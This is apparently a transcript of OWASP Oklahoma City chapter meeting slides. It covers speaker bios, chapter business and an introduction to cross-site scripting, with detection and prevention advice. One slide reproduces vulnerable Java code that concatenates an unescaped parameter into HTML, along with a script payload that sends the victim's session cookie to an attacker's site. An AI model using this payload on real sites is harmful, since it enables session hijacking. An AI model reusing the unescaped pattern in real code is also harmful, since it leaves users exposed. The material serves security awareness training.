Presentation is loading. Please wait.

Presentation is loading. Please wait.

Oklahoma City.

Published byLindsay Oliver Modified over 6 years ago

Similar presentations

Presentation on theme: "Oklahoma City."— Presentation transcript:

1 Oklahoma City

2 Welcome! Thanks to our sponsors! OWASP RCB Bank
Crossroads Information Security

3 Joe Sullivan Started in Infosec with a web hosting company in 1999
Started one of the first outsourced support companies for web hosting servers in 2000 Worked for an ecommerce company for 10 years in network security Currently CISO for RCB Bank 1 to 1 Risk Control & Investigations – Owner/Lead Investigator Consulting for Crossroads Information Security SANS Mentor SEC504 Hacker Tools, Techniques, Exploits, and Incident Handling

4 Jim Thavisouk Jim Thavisouk is currently working at GitLab as their Senior Security Automation Engineer . He has been working closely with automating security in the cloud for the past two years. Before GitLab, he worked with various government agencies, including Department of Defense and Department of Energy, where he focused on vulnerability research against a variety of technologies. Jim also holds a Master's Degree in Computer Science from the University of Tulsa's Cyber Corp program.

5 Stacy Dunn OWASP Oklahoma City Chapter Leader
Information Security Analyst RCB Bank Board Member of Super! BitCon, a local gaming convention. Curator and Founder at Oklahoma Artcade. Super nerd.

6 Contact Information Joe Sullivan: Jim Thavisouk: Stacy Dunn:

7 Oklahoma City Chapter The official page is at: FaceBook YouTube MeetUp: <- Join us on Slack!

8 OWASP The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions. OWASP is in a unique position to provide impartial, practical information about AppSec to individuals, corporations, universities, government agencies and other organizations worldwide. Operating as a community of like-minded professionals, OWASP issues software tools and knowledge-based documentation on application security.

9 OWASP Top 10 The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.

10 OWASP Top

11 Membership Individual Members support OWASP at the $50 USD* level annually. There is also a 2 year membership for $95 USD* and Lifetime membership for $500 USD*. To find out more about Individual Membership, please visit the Individual Member page. Membership is optional Meetings are open to everyone Guests are welcome Memberships help fund our chapter

12 Meetings Web Application Security Web Application Development
Presentations Labs Networking Round Tables Food

13 The Future Conferences (IWS Coming Up) Speakers Presentations News
Challenge Coins Promo Materials Volunteers are welcome!

14 Speaking of Presentations
Cross Site Scripting XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications Better described as a code reflection attack How this works is an attacker crafts a URL with a script in it​ The script in the URL is sent to the server as input​ When the user accesses the URL the server reflects back the script contained in the URL​ The user’s browser processes the script and performs whatever action the script was set to run

15 Cross Site Scripting Attack Scenario
HTML without validation or escaping: (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; Attacker modifies the CC parameter to: '><script>document.location= ' foo='+document.cookie</script>'. This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.

16 More Cross Site Scripting Attacks
Port scanning your internal network using XSS attacks ( Attacking log viewers and user interfaces with XSS Using the Browser Exploitation Framework (BEEF) to attack browsers Using XSS we can steal cookies, scan networks, hook into browsers and do a lot more Good for getting a foothold on a network

17 Detecting Cross Site Scripting Attacks
This is a noisy attack Generates logs SIEM can detect attacks, but may miss obfuscation techniques IPS can alert to XSS attacks IDS can alert to XSS attacks Web application firewall

18 Preventing Cross Site Scripting
Filter out meta characters from requests – do this one the server side, and not the client side Microsoft offers a free anti-XSS library Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails, React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered. Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The OWASP Cheat Sheet 'XSS Prevention' has details on the required data escaping techniques.

19 Preventing Cross Site Scripting
Web application penetration tests regularly Test when changes are implemented to the web application Test when new attacks come out Work with your web application developer on testing and remediation

20 Discussion What would you like to get out of our meetings?
Web Application Security Vulnerability Testing and Remediation Development Security Operations Penetration Testing Incident Response Defending Web Applications

Download ppt "Oklahoma City."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Copyright © 2006 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Hands on Demonstration for Testing Security in Web Applications

Hands on Demonstration for Testing Security in Web Applications
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
The XSS Files Find, Exploit, and Eliminate. Josh Little Security Engineer at global vertical market business intelligence company. 9 years in application.

The XSS Files Find, Exploit, and Eliminate. Josh Little Security Engineer at global vertical market business intelligence company. 9 years in application.
Cross Site Scripting & SQL injection

Cross Site Scripting & SQL injection
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
Browser Exploitation Framework (BeEF) Lab

Browser Exploitation Framework (BeEF) Lab
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Website Hardening HUIT IT Security | Sep 30 2011.

Website Hardening HUIT IT Security | Sep
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
Is Your Website Hackable? Check with Acunetix Web Vulnerability Scanner. Acunetix Web Vulnerability Scanner V9.

Is Your Website Hackable? Check with Acunetix Web Vulnerability Scanner. Acunetix Web Vulnerability Scanner V9.
Workshop 3 Web Application Security Li Weichao March 14 2014.

Workshop 3 Web Application Security Li Weichao March
Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions.

Origins, Cookies and Security – Oh My! John Kemp, Nokia Mobile Solutions.
Prevent Cross-Site Scripting (XSS) attack

Prevent Cross-Site Scripting (XSS) attack
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

Similar presentations

Ads by Google